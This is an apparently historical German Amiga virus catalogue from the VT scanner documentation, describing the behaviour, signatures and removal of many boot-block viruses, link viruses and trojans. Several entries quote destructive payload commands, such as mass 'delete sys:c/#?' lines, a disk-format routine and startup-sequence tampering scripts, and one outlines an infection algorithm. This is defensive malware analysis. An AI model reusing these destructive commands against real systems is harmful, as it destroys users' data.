20454348 t to ECH 348: 4f0a0000 42a90004 O...B... 348: 4f0a0000 42a90004 O...B... 350: 2401e58a 76001630 $...v..0 350: 2401e58a 76001639 $...v..9 ^^ ^^ 358: 28002343 00087201 (.#C..r. 358: 28002343 00087201 (.#C..r. 360: 2341000c b2a90008 #A...... 360: 2341000c b2a90008 #A...... 368: 6e00005c 2411e58a n..\$... 368: 6e00005c 2411e58a n..\$... 370: d4817600 16302800 ..v..0(. 370: d4817600 16392800 ..v..9(. ^^ ^^ 378: 7430b483 6e000016 t0..n... 378: 7439b483 6e000016 t9..n... ^^ ^^ 380: 2611e58b d6817800 &.....x. 380: 2611e58b d6817800 &.....x. 388: 18303800 7639b883 .08.v9.. 388: 18393100 7630b883 .91.v0.. ^^^^ ^^ ^^^^ ^^ 390: 6f000008 22290004 o...").. 390: 6f000008 22290004 o...").. 398: 4ed62429 0004720a N.$)..r. 398: 4ed62429 0004720a N.$)..r. 3a0: 4ead0010 2411e58a N...$... 3a0: 4ead0010 2411e58a N...$... 3a8: d4a9000c 76001630 ....v..0 3a8: d4a9000c 76001639 ....v..9 ^^ ^^ 3b0: 2800d283 74309282 (...t0.. 3b0: 2800d283 74399282 (...t9.. ^^ ^^ 3b8: 23410004 7601d6a9 #A..v... 3b8: 23410004 7601d6a9 #A..v... 3c0: 000c2203 609a2229 ..".`.") 3c0: 000c2203 609a2229 ..".`.") 3c8: 00044ed6 00000000 ..N..... 3c8: 00044ed6 00000000 ..N..... 3d0: 00000001 00000004 ........ 3d0: 00000001 00000004 ........ 3d8: 00000092 000003f2 ........ 3d8: 00000092 000003f2 ........ VT findet den Verursacher beim Filetest und im Speicher. Zerstoerte Files findet der VT NICHT !!! Das Virusteil setzt KEINEN Merker in befallene Files. Also kann VT nicht entscheiden ob $39 wirklich $39 ist oder umgewandelt werden muesste. Sobald bekannt ist, dass das File behandelt worden ist, ist die er- neute Zahlendrehung natuerlich moeglich. Hat jemand einen Tip, wie man die notwendige Behandlung erkennen koennte. Schwacher Trost: Bei der erneuten Behandlung des zerstoerten Files mit dem Virusteil wird wieder der Originalzustand hergestellt. Hinweis: Wurden sehr viele Prge. zum Kopieren markiert, so wurde haeufig der RootBlock von DF1: unbrauchbar. - Abraham siehe Claas Abraham - ACCESS FORBIDDEN BB anderer Name: s.u. bei VCCofTNT-Virus - ACCESS FORBIDDEN 2 BB anderer Name: s.u. bei VCCofTNT-Virus - acp.ctrl Laenge: 56016 Bytes siehe bei Express 2.20 - ACP3.19-Trojan s.u. bei UA62-ACP-Trojan - Achtung-Trojan Zerstoerungsfile Filename: Achtung oder Achtung.exe Wird in einem angeblichen Demo-LHA weitergegeben. Laenge ungepackt: 14032 Bytes Verwendet ungerade Adresse: lea unger.Adr. ,a0 Der 68000-Proz. freut sich. Keine verbogenen Vektoren KEINE Vermehrung Empfehlung: Loeschen Decodiert mit subq.b #8,(a0)+ ist im File zu lesen: 79005241 4d3a5665 72776972 72756e67 y.RAM:Verwirrung 203e6e69 6c3a2064 72697665 20646830 >nil: drive dh0 3a206e61 6d652022 4c414d45 52222071 : name "LAMER" q 7569636b 206e6f69 636f6e73 0052414d uick noicons.RAM 3a566572 77697272 756e6700 6468303a :Verwirrung.dh0: 4c414d45 522e4141 41414141 41410000 LAMER.AAAAAAAA.. Schadensverlauf: Im File ist ein Original-Format-File enthalten. 6d617420 33372e31 30202835 2e362e39 mat 37.10 (5.6.9 31290a0d 00006963 6f6e2e6c 69627261 1)....icon.libra Dieser Teil wird unter dem Namen Verwirrung ins RAM: kopiert. Danach soll dh0: schnell mit dem Namen LAMER formatiert wer- den. Damit die Sache nicht zu leicht zu reparieren ist, wer- den danach neue Files (Laenge $2800) mit dem Namen LAMER.AAAAAAAA angelegt. Die 8 A werden dabei immer ver- aendert. Meine Empfehlung: Im Schadensfall - wagen Sie einen Reset und versuchen Sie mit Disksalv noch etwas zu retten. - ADAM BRIERLEY BB Cold immer $7E700 KEIN Virus !!!! Namensbegruendung: 2A202020 20434F44 45204259 20204144 * CODE BY AD 414D2042 52494552 4C455920 2020202A AM BRIERLEY * KEINE Vermehrungsroutine !!! Es handelt sich um einen Bootblock- lader, was man bei RICHTIGER Reassemblierung leicht feststellen kann. Es koennte sich sogar um einen BB handeln, aus dem eine Schutzroutine entfernt wurde (sehr viele NOPs an einer Stelle). Warum die Beschreibung doch hier steht und nicht in "VT andere BB"? Damit die Erbsenzaehler nicht 2 Texte lesen muessen !! VT kennt: 15.10.92 - Addy-Trojan File VT bietet nur loeschen an. Keine verbogenen Vektoren Nicht resetfest Laenge gepackt: 9584 Bytes Es wird ein Script-Packer verwendet, den ich bis jetzt nur selten gefunden habe. Braucht copy, delete mit FORCE (also neuere WB) und wait. Sonst Abbruch des Scripts. Fuehrt danach Reset aus. Im File ist zu lesen: 6d6f7279 0000434f 4e3a302f 302f3634 mory..CON:0/0/64 302f3230 302f5465 73743031 0000646f 0/200/Test01..do 732e6c69 62726172 79007261 6d3a7100 s.library.ram:q. 72616d3a 54656d70 00006364 2072616d ram:Temp..cd ram 3a54656d 700a5255 4e200000 00000000 :Temp.RUN ...... ;..... 00000000 00000000 00006364 2072616d ..........cd ram 3a54656d 70200a45 58454355 54452000 :Temp .EXECUTE . ;..... 00000000 00000000 00000000 0a656e64 .............end 636c690a 0a776169 7420330a 656e6463 cli..wait 3.endc 6c690a00 00000000 00000004 446f6974 li..........Doit Schaeden: Schreibt neuen Dir-Befehl (Addy-Dir-falsch s.u.) Veraendert startup-Sequence, User-Startup und Shell-Startup. Sie muessen jetzt leider auch von diesen Files ein Backup auf Disk haben. Shell-Startup: Vorher: ;...... Alias XCopy "Copy CLONE " Nachher: ;...... Alias XCopy "Copy CLONE " wAiT 5 Echo Wait 5 >>Sys:S/sTarTup-sEquEncE Startup-Sequence: Vorher: ;cls ;Testzeile ;testzeile ;testzeile Nachher: Prompt "aFraId ?..tHe fReAk wAs hEre 2 dEvEstAtE NDOS:>" wAiT 5 Also einfach den Beginn meiner Startup geloescht !!!!! User-Startup: Vorher: ;...... ;END AsimCDFS Nachher: ;...... ;END AsimCDFS wAiT 5 In RAM:T und RAM:Temp sind mehrere Files aufgetaucht, die aber durch den RESET wieder verschwinden. Ein Beispiel: Doit (ein Script) Inhalt: Type Ram:temp/Oups >Sys:s/StaRtup-SeqUeNcE Delete C:Dir Quiet Force Copy Ram:temp/Dir C: eCHo wAiT 5 >>SyS:s/sTarTuP-SeQuEnCe eCHo wAiT 5 >>SyS:s/uSeR-StaRtUp eChO wAiT 5 >>SyS:S/SheLl-StArtUp Echo Echo Wait 5 >>Sys:S/Shell-Startup >>Sys:S/sTarTup-sEquEncE Echo Error #0025 Programme Loop Unexpected Wait 1 Test01 - Addy-Dir-falsch: VT bietet loeschen an. Laenge gepackt: 2784 Bytes Laenge entpackt: 8248 Bytes Keine verbogenen Vektoren Keine Vermehrung Die Dir-Funktion wird NICHT erfuellt. Im entpackten File ist zu lesen: 69627261 72790053 3a442d54 4543545f ibrary.S:D-TECT_ 444f435f 4449534b 00000000 00000000 DOC_DISK........ Nach diesem File wird gesucht. Falls es nicht gefunden wird, erfolgt ein RESET. Ein D-TECT_DOC_Disk-File enthaelt z.B.: 4f454e49 580a4144 414d5320 46414d49 OENIX.ADAMS FAMI 4c592e48 494e5453 0a414456 2057494c LY.HINTS.ADV WIL 4c592042 45414d49 53482e53 4f4c0a41 LY BEAMISH.SOL.A ;usw........ Es handelt sich also um eine Aufzaehlung von Dateinamen, die sich auf der Disk befinden. Der falsche Dir-Befehl schafft nun eine Flaeche, auf der die Dateinamen in Gadgets dargestellt werden. Eine Zerstoerungs-Routine konnte ich durch diesen Dir-Befehl NICHT ausloesen. Trotzdem MUESSEN Sie diesen falschen Dir-Befehl ersetzen, da die echten Dir-Funktionen NICHT erfuellt werden. Hinweis: Sie koennen beim Testen von aelteren PD-Serien durchaus die Meldung "Addy-Dir-falsch" erhalten. Das Programm scheint also wirklich als eigenstaendiges Programm existiert zu haben. Nur heisst da das Programm NICHT dir, sondern 142, menu.exe usw. . In diesen Faellen ist es NICHT schaedlich, da es seine Funktion erfuellt und der echte Dir-Befehl nicht beruehrt (geloescht) wurde. Warum gerade dieses alte Programm im Script (s.o) als Dir ver- wendet wird ? Keine Ahnung !!! Hinweis: Mit der Pruefsummenoption (vgl. VT-Prefs) haetten auch aeltere VT den Dir-Befehl als veraendert erkannt. - AeReg.BBS-Trojan File ImplLib gepackt Laenge: 656 Bytes entpackt Laenge: 664 Bytes Keine Vermehrungsroutine Keine verbogenen Vektoren Zielgerichtet gegen AmiExpress Soll aus einer unregistrierten Version eine registrierte Version machen. Im entpackten File ist zu lesen: "/X registrator v0.1" "bbs:user.data",0 "bbs:user.key",0 "bbs:utils/express",0 "Registrator for Ami-Express",0 "Startup /X 3.9 Crack As Normal2,0 "Run Registrator v0.1",0 "To Update 3.9 to a Registation /X",0 "Registration LRA-11.0089",0 "This is an un-registered version of Express",0 "Registration UOB-09.0493",0 "Registration version of Express v3.9",0 Schadensverlauf: Mit dem Open-Befehl aus der dos.lib sollen drei BBS-Files (s.o.) geoeffnet werden (Mode-NewFile) und 11 Bytes geschrieben werden. Die Files haetten dann die Laenge 11 und die Original-Files waeren somit zerstoert, da sie ueberschrieben werden. Da ein Programmierfehler vorliegt (Filehandle !!) werden Files mit der Laenge 0 erzeugt und auch hier sind die Original-files zerstoert. Dringende Empfehlung: sofort loeschen VT.kennt: 12.09.93 anderer moeglicher Name: Registrator-Virus - AFFE-Virus s.u. SADDAM-Clone - ahkeym-Trojan Zerstoerungsfile Laenge ungepackt: 2168 Bytes KEINE verbogenen Vektoren KEINE Vermehrung Empfehlung: sofort loeschen laut File.ID soll es sein: A-Heaven Master keymaker Am Anfang des Files ist uncodiert zu lesen: 724d5321 277e00a6 08726578 78737973 rMS!'~...rexxsys 6c69622e 6c696272 61727900 52455858 lib.library.REXX ;..... 3a1b451b 5b336d1b 5b33316d 20437245 :.E.[3m.[31m CrE 61546544 20576954 683a1b5b 336d1b5b aTeD WiTh:.[3m.[ 316d2027 52655858 4d615348 65522720 1m 'ReXXMaSHeR' ;usw. Wenn ich das richtig verstanden habe: Es wird zuerst ein Scriptfile erstellt. Danach wird dieses File mit dem Tool Rexxmasher (hab ich JETZT) in ein ausfuehrbares File ($3F3) umgewandelt. Damit die Gefahr nicht sofort erkannt wird, wird das Script CODIERT in einem DataHunk untergebracht. Auszuege aus dem Script: a) gegen Prometheus (BBS ??) sys:c/delete Prometheus:pmbs.key sys:c/delete Prometheus:daten/#? sys:c/delete Prometheus:bretter/#? ;usw. b) gegen jedermann: sys:c/delete sys:s/#? sys:c/delete sys:c/#? ;hier muesste dann schon Schluss sein sys:c/delete sys:libs/#? ;da c ja leer ;usw. c) gegen jedermann, der in c das Programm killrdb (kenne ich nicht) hat. Duerfte aber nicht gehen, da c ja schon leer. sys:c/killrdb scsi.device all force sys:c/killrdb oktagon.device all force ;usw. Am Schluss soll dann Reboot ausgefuehrt werden. Hinweis eines Anwenders (Juli 95): Danke a: RexxMasher ist ein Tool, welches AREXX-Scripte compiliert und zu lauffaehigen Programmen macht. b: Alle compilierten Files lassen sich mittels eines Passwortes wieder zu Arexxprogrammen machen. (Wusste ich NICHT) c: A-Heaven ist eine PMBS (Prometheus) Mailbox. A-Heaven hat bisher einige Tools fuer PMBS rausgebracht. Diese Tools sind alle in AREXX geschrieben. - aibon-Virus siehe bei Express2.20-Virus - aibon 2-Virus siehe bei Express2.20-Virus - Aids Vkill-Clone siehe dort Unterschied: 3 Bytes 1.Byte: in der Pruefsumme 2.Byte: Vermehrungszaehler 3.Byte: Einsprung in entschluesselten Text (ein Prg. springt z.B. nach $7ebc3, das 2. Prg. nach $7eba9) - AIDS-HIV SCA-Clone, Cool immer 7EC3E, nur anderer Text - AIFS-JITR-Virus BB Clone s.u. bitte nicht mit A.I.F.S verwechseln Nur Texte geaendert 444f5300 2e56d968 41494653 2c790000 DOS..V.hAIFS,y.. Belegt seinen Speicherbereich nicht und kann deshalb bei 1Meg von VT überschrieben werden und ist damit auch zerstoert. Bei 5 Meg wird das Teil sicher erkannt. Der Speicherplatz spielt KEINE Rolle bei der BB-Erkennung. - AlienNewBeat Cold, Cool, DoIo, nur KS1.2, Fastmem ja im Speicher immer ab $20000 Vermehrung: ueber BB Vermehrungszaehler: $2037e Text im BB sichtbar: z.B. THIS IS THE ALIEN NEW BEAT BOOT! Clone: EXORCIST , SATAN usw. - Ami-Hacker.BBS File Laenge gepackt : 3560 Bytes Laenge entpackt: 4460 Bytes Fundort z.B.: CD-LSD2:A/COMMS/AMIEX/ACS_HACK.LHA Keine Vermehrungsroutine Keine verbogenen Vektoren Also KEIN Virus Zielgerichtet gegen AmiExpress. Soll Daten aus der Mailbox be- sorgen. Im File ist zu lesen: 000000b5 54686520 416d692d 45787072 ....The Ami-Expr 65737320 50617373 576f7264 20486163 ess PassWord Hac 6b65722e 20427920 43726179 2d312046 ker. By Cray-1 F Empfehlung: Loeschen - AMIDA-FORPIB Virus BB Forpib-Clone s.u. 2e2e414d 4944412e 2e2e2e2e 2e2e2e2e ..AMIDA......... - AMIGA FANATIC Virus BB Im Speicher immer ab $7F300. Verbogene Vektoren: Cool $7F372 DoIo $7F3A8 KS2.04: bei mir GURU4 nach RESET mit schreibgeschuetzter Disk Fordert trackdisk.device nicht. Verlangt aber DOS0 . Vermehrung: BB Schaeden: Sobald eine Zaehlzelle den Wert 3 erreicht hat, soll der Root- bereich ($6E000 stimmt nur bei DD-Disk) mit Muell aus Speicher ab $70000 gefuellt werden. Das Virusteil meldet sich nicht mit Text. Im BB ist uncodiert zu lesen: f18051c8 ffec4e75 20202020 20202041 ..Q...Nu A 4d494741 2046414e 41544943 20202056 MIGA FANATIC V - Amiga Freak Forpib-Clone s.u. nur Name im BB geaendert - AMIGAKNIGHTVIRUS Filevirus Laenge: 6048 (ungepackt) DoIo, KickTag, KickCheckSum Schreibt in Root das File init_cli und auch in startup-sequence Sonst keine Schaeden festgestellt. Nach 5 Resets wird der Bildschirm schwarz und rosa Schrift fuer Text. Der Text ist bis dahin codiert. oberer Bildschirmbereich: YEAH, THE INVASION HAS STARTED! YOUR TIME HAS RUN OUT, AND SOON WE WILL BE EVERYWHERE! Bildschirmmitte: Vektordemo unterer Bildschirmbereich: THIS IS GENERATION 0039 OF THE EVIL AMIGAKNIGHTSVIRUS GREETINGS TO DUFTY, DWARF, ASID CUCUMBER ASTERIX, ANDY, AND ALL AMIGIANS I KNOW Vektordemo: 3 TextTeile erscheinen mit Zoomeffekt nacheinander a) Toco of b) THE c) AMIGAKNIGHTS - AmiPatch-Virus V1.0a File Laenge:8288 Bytes Wahrscheinlich ein Einbruchswerkzeug, also ungefaehrlich fuer den Normal-User ohne Mailbox. Oeffnet user.data und legt ein neues File an (doswrite): bbs:011011 Ich haette das Programm nicht aufgenommen, wenn es nicht auch OHNE Hauptprogramm in der Shell behaupten wuerde, zu opti- mieren (Prozentzahlen). Hinweis 12.94: Ein Antivirusprogramm erkennt in den Files MakeIcon, SCSIMaskFix, CDSETMAP, FixIcon usw. ebenfalls das AmiPatch-Virus. Ich gehe davon aus, dass die FEHLERKENNUNG im naechsten Update behoben sein wird. - Angel-Virus BB Cool, PutMsg, Wait Fordert trackdisk.device NICHT Nach RESET GURU, da Cool absoluten Sprung enthaelt: 4EF9 000110CC JMP $110CC (Anfaenger !!) Namensbegruendung: s.u. Vermehrung: ueber BB (auch wenn die Cool-Routine falsch ist) Jeder BB sieht anders aus, da codiert mit Wert aus $DFF007 . Schaeden: Abhaengig von einer Zaehlzelle wird ueber Seek ein KopfStep ausgefuehrt. Die Textausgabe (s.u.) ist mir nicht gelungen. Text im Speicher decodiert mit: eor.b d2,(a1)+ 54686520 54726176 The Trav 656c206f 66207468 6520416e 67656c2d el of the Angel- 56697275 73204765 6e657261 74696f6e Virus Generation 204e722e 30303030 30202048 69204275 Nr.00000 Hi Bu 746f6e69 63202620 47616e64 616c6600 tonic & Gandalf. 4c617566 7765726b 20444630 3a206973 Laufwerk DF0: is 74206c65 69646572 20626573 6368e464 t leider besch.d 6967742e 2e2e0000 igt... VT-kennt: 02.12.92 - Animal-Virus SADDAM-Clone Wird von VT als SADDAM-Clone erkannt. Blocklangwort: $363636a0 Namensbegruendung: im Speicher ist decodiert zu lesen 74726163 6B646973 6B2E6465 76696365 trackdisk.device 00010820 416E696D 616C2056 69727573 ... Animal Virus Behandlung: siehe bei SADDAM 28.03.93 - ANTI-KANACKEN-Virus BB SCA-Clone (s.u.) Namensbegruendung: 6f732e6c 69627261 72790000 44617320 os.library..Das 414e5449 2d4b414e 41434b45 4e205669 ANTI-KANACKEN Vi 72757320 28536965 67204865 696c292d rus (Sieg Heil)- Hallo ihr jungen Leute im wiedervereinigten Deutschland. Wollt ihr, dass die Welt Grund hat, mit dem Finger auf uns zu zeigen. So schafft ihr es bestimmt, ALLES was eure Eltern in 47 Jahren aufgebaut haben, in kurzer Zeit kaputt zu machen. Denkt BITTE nach !!! VT-kennt: 17.10.92 - Antichrist-Virus Link dosbase+$2e KS2.04: nein Grundgeruest war ein Trav. Jack (siehe unten) Namensbegruendung: im Speicher ist zu lesen: 20202020 20202020 20202020 20202020 20202020 20202020 20546865 20416e74 The Ant 69636872 69737420 332f342f 39322020 ichrist 3/4/92 20202020 20202020 20202020 20202020 Unterschiede zu Trav, Jack: - legt ab und zu ein File an mit der Laenge: #26 Bytes Name Antichrist.X (das X wechselt, siehe Beispiel). Inhalt des Textfiles siehe Beispiel Antichrist.Y 0c0a0d54 68652041 6e746963 68726973 ...The Antichris 74206973 20626163 6b0a0000 00000000 t is back....... - Codierung des VirusPrg.s fehlt. - Hunklaenge wechselnd $24f oder $250 VT erkennt und loescht im Speicher: 13.03.93 VT erkennt und baut aus im File : 14.03.93 VT erkennt und loescht neues File : 14.03.93 - Art Byte Bandit anderer Name: ByteBanditPlus s.u. - ASSASSIN Virus BB SCA-Clone s.u. 43544544 20425920 54484520 20202050 CTED BY THE P 50041f41 53534153 53494e20 56495255 P..ASSASSIN VIRU 53202020 20202020 20202020 20202020 S - ASV-Virus immer $7DC00, Cool, im Prg Forbid, loescht KickTag usw. keine Vermehrungsroutine Schaden: verbiegt mit setfunction Forbid auf ChipAllocMem-Routine d.h. bei jedem Forbid-Aufruf geht ChipMem verloren. - ASYLANT-Virus SCA-Clone nur Test geaendert 2048616c Hal 6c6f2069 63682062 696e2065 696e2020 lo ich bin ein 4153594c 414e5420 21212121 21212121 ASYLANT !!!!!!!! - ATARI File BGS9-Clone s.u. Laenge:2609 Bytes 00000000 41544152 49000003 f3000000 ....ATARI....... Wird weiterhin als BGS9 erkannt. Seit wann bitte ist ein Programm mit UNGERADER Laenge lauf- faehig (Sollte loadhunk defekt ausgeben). Man kann nicht einfach aus TTV1 den Text ATARI machen und damit alles um 1 Byte verlaengern. Anfaenger !!! - Australian Parasite Fastmem ja, Cool, DoIo, im Prg. BeginIo Vermehrung: ueber BB ueber GraphikRoutine wird BildschirmInhalt gedreht im BB sichtbar: The Australien Parasite! By Gremlin 18/5/88! Will NOT destroy game bootsectors or corrupt disks, and kill other viruses! HINWEIS: manchmal gibt VirusX Australian Parasite aus, obwohl es sich um den SADDAM Disk-Validator handelt !!!! - Aust.Par-Clone BB anderer Name:SHI-Virus Nur Text geaendert: 20576520 6c696b65 20566972 692e2043 We like Viri. C 616c6c20 5658512d 42425320 28343136 all VXQ-BBS (416 29203332 34203934 3339202e 53656e64 ) 324 9439 .Send 206e6577 20766972 69202c20 77656c63 new viri , welc 6f6d6520 746f2042 42532020 3a000018 ome to BBS :... 00002053 48492153 48492153 48492153 .. SHI!SHI!SHI!S - AutoBootingBootProtector V2.0 anderer Name: VCCofTNT-Virus s.u. - B.E.O.L.-LVirus Link-Virus Namensbegruendung s.u. Andere moegliche Namen: Mount-972-Virus, 4EAE-Virus, FFFFFFE9-Virus Verlaengert ein File um 972 Bytes. Im decodierten Linkteil ist zu lesen: 22006720 4eaeff82 4eaeffa6 6108632f ".g N...N...a.c/ 6d6f756e 7400221f 242afff0 4eaeffe2 mount.".$*..N... Keine verbogenen Vektoren Nicht Resetfest Haengt sich im Speicher fest ueber Dos-Strukturen. VOLUME-MsgPort Schreibt $FFFFFFE9 nach $202(a6) (LastAlert) KS2.04: ja (cmpi.b #$25,$15(a6) Der Linkteil wird mit Wert aus $DFF006 immer neu codiert. VT versucht Ausbau und versucht $4EAEuvwx wieder richtig zu setzen. Test mit Syquest-44: in 1/4 Stunde waren alle wichtigen Dirs hoffnungslos verseucht. Das Teil meldet sich nicht. Verwendet Sprungbefehle, die erst in neueren KS vorkommen. Haengt sich hinter Hunk. Ablauf: Test auf $03F3 (ausfuehrbar) Test auf $FFFFFFE9 (schon verseucht) Suche nach $4EAE ( jsr -xy(Lib-Base) ) ( xy ist variabel, aber meist openlib) Falls gefunden, Test ob Abstand zu Hunkende kleiner $7FFF. Falls nein, weitersuchen Falls ja ( addi.b #$c,-(a1) ) d.h. $4EAE wird in $4EBA ( jsr Hunkende(PC) ) geaendert. Sobald eine Zaehlzelle nach LSL.B #2,D1 Null wird, wird ein weiterer Linkteil mit NEG.L (A7) noch einmal decodiert. Es wird dann ein File README mit der Laenge 1152 Bytes geschrieben. Dieses File enthaelt 32x : ©+® B.E.O.L. 1995! Don't be angry!! Speichererkennung: VT aendert LastAlert NICHT. (Kein neuer BEOL-Virus wird im Speicher nachgeladen) VT versucht das Teil im Speicher abzuschalten (Bei meinen Tests gelungen). Wenn Sie 100%-Sicherheit haben wollen, dann nutzen Sie das Reset- Angebot. Booten Sie UNBEDINGT von einer SAUBEREN Antivirusdisk !!!! Ein Reset und dann die startup-sequence der Festplatte abarbeiten zu lassen, ist gefaehrlich, da hoechstwahrscheinlich Programme der startup-sequence verseucht sind !!!!!!!!! Hinweis: Falls sehr viele Dirs verseucht sind, empfehle ich Ihnen mit Sp-File-Sp (FileReq.) zu arbeiten. VT bewegt sich dann nur in dem gewaehlten Verzeichnis. - Klicken Sie Sp-File-Sp - Klicken Sie devs - Waehlen Sie ein Unterverzeichnis - Klicken Sie DirFTest - Lassen Sie VT die Ausbauten vornehmen - Waehlen Sie danach ein anderes Unterverzeichnis Ueberlegen Sie bitte auch, ob Sie nach der Entseuchung nicht einzelne Unterverzeichnisse ins RAM kopieren wollen. Danach z.B. das c: komplett loeschen und dann von RAM zurueckkopieren. Die Fragmentierung der Festplatte duerfte verkleinert werden. Falls die Meldung "Sprungbefehl falsch" bei VT auftaucht: VT glaubt am 1. Hunkende das Virusteil gefunden zu haben, findet aber den Sprungbefehl nicht. Ueberlegen Sie bitte ob das File vielleicht schon mit einem anderen Programm bearbeitet wurde und lassen sie dann VT versuchen, das Linkteil auszubauen. Es gab in der Vergangenheit schon MEHRMALS Programme, die NUR die Aktivierung des jeweiligen Virusteils abgeschaltet haben, das Virusteil selbst aber NICHT ausge- baut haben. - BadBytes1-Virus BB Warhawk Clone siehe unten Nur Text geaendert. Der Name ist fuer mich nicht nachvollziehbar. Wenn schon, dann waere TTS-Virus besser gewesen. 00200096 81005454 53205649 52555320 . ....TTS VIRUS 4953204f 4e205448 4953204c 414d4552 IS ON THIS LAMER 27532057 4f524b20 21212121 21202041 'S WORK !!!!! A - BadBytes2-Virus BB TimeBomb V1.0 Clone siehe unten Text fuer DisplayAlert: 14536f66 74776172 65204661 696c7572 .Software Failur 65202d20 57652068 61746520 796f7521 e - We hate you! 20596f75 20617265 20676f69 6e672074 You are going t 6f204449 45210001 00000000 42b90007 o DIE!......B... Namensbegruendung: 00416e74 692d4861 72616c64 20506175 .Anti-Harald Pau 6c73656e 20616e64 20547769 6e732076 lsen and Twins v 69727573 20646f6e 65206279 20545453 irus done by TTS 20616e64 204e6967 68746861 776b2020 and Nighthawk 6f662042 61644279 74657349 6e632e2c of BadBytesInc., - BadBytes3-Virus BB Blackflash-Clone siehe unten Nur Text geaendert: 20204951 20427265 616b6572 20766972 IQ Breaker vir 75732020 20220cb9 6600000e 0007f030 us "..f......0 ;...... 446f6e65 20627920 42616420 42797465 Done by Bad Byte 7320496e 63202d20 5468616e 7820746f s Inc - Thanx to - BadBytes4-Virus BB SCA-Clone siehe unten Nur Text geaendert: 6f732e6c 69627261 72790000 20506172 os.library.. Par 61736974 65206f66 20426164 20427974 asite of Bad Byt 65732049 6e632070 72657365 64d2aa2d es Inc presed..- - BadBytes5-Virus BB Coder-Clone siehe unten Nur Text geaendert. Name nicht nachvollziehbar ueber Text. 596f7572 20636f6d 70757465 72206973 Your computer is 2073746f 6e656421 204c6567 616c697a stoned! Legaliz 65206d61 72697568 616e6121 20506172 e mariuhana! Par 61736974 65206f66 20424249 21201400 asite of BBI! .. - BAHAN anderer Name BUTONIC_1.1 siehe dort - Bavarian (L) BB Intro der Bavarian-PD Serie Kein Virus, da keine Vermehrung. Aber zumindest der BB auf Disk 79 schreibt GURU nach $60. Dringende Empfehlung deshalb: Loeschen Im BB ist zu lesen: 70ff4e75 204041e8 002823fc 47555255 p.Nu @A..(#.GURU 00000060 43f900df f000337c 00a00096 ...`C.....3|.... Hinweis: Es liegen auch zwei Bavarian-BB-Intros vor, die nach meiner Meinung harmlos sind. Lesen Sie bitte in VT.andere-BB nach. - Baltasar-Virus BB SCA-Clone s.u. - BB-Prot BB Virus anderer Name: T.ET.E s.u. - BBS-Trojan Diese Programme sind haeufig NICHT vermehrungsfaehig. Sie dienen meist als Einbruchswerkzeug in eine Mailbox UND in einigen Programmen ist eine Zerstoerungsroutine eingebaut. Typ A (28.05.93): Das Programm DiskRepair V1.2 wurde verseucht. Verseuchte Laenge: 49336 Bytes Methode: 4EB9-Link Das BBS-Teil wird NACH DiskRepair aufgerufen. Virus: Imploder gepackte Laenge : 6472 Bytes Lauffaehig entpackt Laenge: 10244 Bytes Das Teil wird NICHT aktiv, falls SnoopDos im Speicher ist. Es wird nach bestimmten Filelaengen gesucht. Im BBS-Teil ist zu lesen: 4ebafd18 4e5d4e75 536e6f6f 70446f73 N...N]NuSnoopDos 00424253 00424253 3a004242 533a0042 .BBS.BBS:.BBS:.B 42530042 42533a00 4242533a 5574696c BS.BBS:.BBS:Util 732f0000 4e55fffc 48e70820 246d0008 s/..NU..H.. $m.. VT bietet an loeschen. ODER: Sie gehen in den Filerequester und schalten mit Link2aus das Virusteil im File ab. Typ B (06.06.93): Das Programm WhiteBox V8.0 wurde verseucht. Verseuchte Laenge: 34896 Bytes Methode: 4EB9-Link Das BBS-Teil wird VOR WhiteBox aufgerufen. Virus: Imploder gepackte Laenge : 6980 Bytes Lauffaehig entpackt Laenge: 11204 Bytes Das Teil wird NICHT aktiv, falls SnoopDos im Speicher ist. Es wird nach bestimmten Filelaengen gesucht. Im BBS-Teil ist zu lesen: 414d492d 45585052 4553535f 52554c45 AMI-EXPRESS_RULE 5a3a0041 4d492d45 58505245 53535f52 Z:.AMI-EXPRESS_R 554c455a 3a626273 2f00 ULEZ:bbs/. ;...... 4ebafe48 60d0536e 6f6f7044 6f730042 N..H`.SnoopDos.B 42530042 42533a00 4242533a 00004e55 BS.BBS:.BBS:..NU VT bietet Ausbau an. vgl. auch LHAV3-BBS-Trojan, Viewtek22-Installer - BEETHOVEN 22.11.92 File Laenge:2608 immer ab $7EF00 Bret Hawnes Clone KS2.04: ja Kicktag, SumKickData, KickCheckSum, OpenNewLib, $6C Namensbegruendung : siehe bei DisplayAlert (Unterschied zu B.H.) Abhaengig von der Zeit meldet sich das VirusTeil mit DisplayAlert. Die Routine und der Text wird decodiert mit: not.b (a1) eor.b #$27,(a1)+ Da hierbei die intuition.base hardcodiert im RangerRam ($c...) abgelegt wird, wird nicht jeder in den "Genuss" des Textes kom- men. (Ich denke ein Anfaenger war am Werk) 62726172 79000000 00000096 14484559 brary........HEY 20212049 43482042 494e205a 5552dc43 ! ICH BIN ZUR.C 4b202121 21212121 21212100 01007d2d K !!!!!!!!!....- 2d3d3e20 4c554457 49472056 414e2042 -=> LUDWIG VAN B 45455448 4f56454e 203c3d2d 000100aa EETHOVEN <=-.... 46494348 204d4143 4845204d 49434820 FICH MACHE MICH 4a45545a 54204155 46204445 4d200001 JETZT AUF DEM .. 00d75541 4d494741 20425245 49542021 ..UAMIGA BREIT ! 21212120 00010096 69444153 20484945 !!! ....iDAS HIE 52204953 5420dc42 52494745 53204d45 R IST .BRIGES ME 494e204e 45554552 20564952 55530001 IN NEUER VIRUS.. 00967d48 45204845 20484520 48452048 ...HE HE HE HE H 45204845 2048452e 2e2e2e20 20000100 E HE HE.... ... 96875649 454c2053 5041df20 4e4f4348 ..VIEL SPA. NOCH 2e2e2e20 00010096 91502e53 2e204d45 ... .....P.S. ME 494e4520 4d555349 4b205741 52205343 INE MUSIK WAR SC 484549df 45200001 00bea02d 20414245 HEI.E .....- ABE 52204d45 494e4520 56495245 4e205349 R MEINE VIREN SI 4e442047 45494c20 21210001 00e1b453 ND GEIL !!.....S 55434b20 4d592044 49434b20 0001005a UCK MY DICK ...Z c3424954 54452043 4f4d5055 54455220 .BITTE COMPUTER 41555353 4348414c 54454e2e 2e2e2000 AUSSCHALTEN... . startup-sequence verseucht: c0a0e0a0 c00a636c 730a0a00 00000000 ......cls....... ^^^^^^^^^^^^^ Das Virusteil schreibt sich also in die erste Zeile der s.-seq. . Diese Aenderung muessen Sie von Hand mit einem Editor rueckgaengig machen. Das Programm selbst schreibt sich in die Root einer Disk mit $C0A0E0A0C0 (ist sichtbar) Nach 10 Vermehrungen wird bei B.H. eine Format-Routine an- gesprungen. Diese Routine fehlt bei BEETHOVEN. Stattdessen wird die DisplayAlert-Routine angesprungen. - BESTIAL-Virus Link dos.open Gefunden an das Prg. border (Torsten 